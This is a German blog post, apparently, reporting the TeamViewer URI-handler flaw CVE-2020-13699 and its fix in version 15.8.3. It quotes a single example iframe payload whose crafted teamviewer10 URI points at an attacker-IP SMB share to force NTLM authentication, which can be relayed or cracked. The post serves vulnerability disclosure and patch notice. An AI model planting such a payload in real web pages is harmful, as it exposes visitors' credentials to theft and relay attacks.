TeamViewer: Patch verhindert ungewollten Zugriff auf PC

[English]In älteren Versionen der Remote-Zugriffs-Software TeamViewer gab es eine Schwachstelle. Diese ermöglichte es Dritten unbemerkt eine Verbindung zum jeweiligen PC aufzubauen. Die Schwachstelle wurde durch einen Patch beseitigt.


Anzeige

Die Schwachstelle CVE-2020-13699

Die Schwachstelle CVE-2020-13699 betraf den TeamViewer Desktop für Windowsbis zur Version 15.8.2. Die Software zitiert seine benutzerdefinierten URI-Handler nicht korrekt. Eine bösartige Website konnte den TeamViewer mit beliebigen Parametern starten, wie:

teamviewer10: –play URL

Die ermöglichtes es einem Angreifer ein Opfer zu zwingen, eine NTLM-Authentifizierungsanforderung zu senden und entweder die Anforderung weiterzuleiten oder den Hash zum Offline-Kennwort-Knacken zu erfassen. Der Entdecker der Schwachstelle beschreibt diese hier folgendermaßen.

An attacker could embed a malicious iframe in a website with a crafted URL:

<iframe src="teamviewer10: –play \\attacker-IP\share\fake.tvs">

that would launch the TeamViewer Windows desktop client and force it to open a remote SMB share. Windows will perform NTLM authentication when opening the SMB share and that request can be relayed (using a tool like responder) for code execution (or captured for hash cracking).

Das könnte bei Watering Hole-Angriffen benutzt werden, um unbemerkt eine Verbindung aufzunehmen, wie man hier nachlesen kann. Dabei ist nicht einmal ein Passwort erforderlich. Allerdings gibt es bisher keine Anzeichen, dass die Schwachstelle ausgenutzt wird.


Anzeige

Update auf TeamViewer Version 15.8.3

Bei Bleeping Computer habe ich hier mitbekommen, dass es ein Update des TeamViewer auf die Version 15.8.3 gab, das die Schwachstelle schließt. Allerdings hat der Anbieter vor ca. 2 Wochen das Update in diesem Community-Beitrag angekündigt.

Statement on CVE 2020-13699

Today we are releasing some updates for TeamViewer 8 through 15, for the Windows platform.

We implemented some improvements in URI handling relating to CVE 2020-13699.

Die Änderungen sind im Changelog nachlesbar.


Anzeige

Dieser Beitrag wurde unter Sicherheit, Software, Update abgelegt und mit , verschlagwortet. Setze ein Lesezeichen auf den Permalink.

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert

Hinweis: Bitte beachtet die Regeln zum Kommentieren im Blog (Erstkommentare und Verlinktes landet in der Moderation, gebe ich alle paar Stunden frei, SEO-Posts/SPAM lösche ich rigoros). Kommentare abseits des Themas bitte unter Diskussion.

Du findest den Blog gut, hast aber Werbung geblockt? Du kannst diesen Blog auch durch eine Spende unterstützen.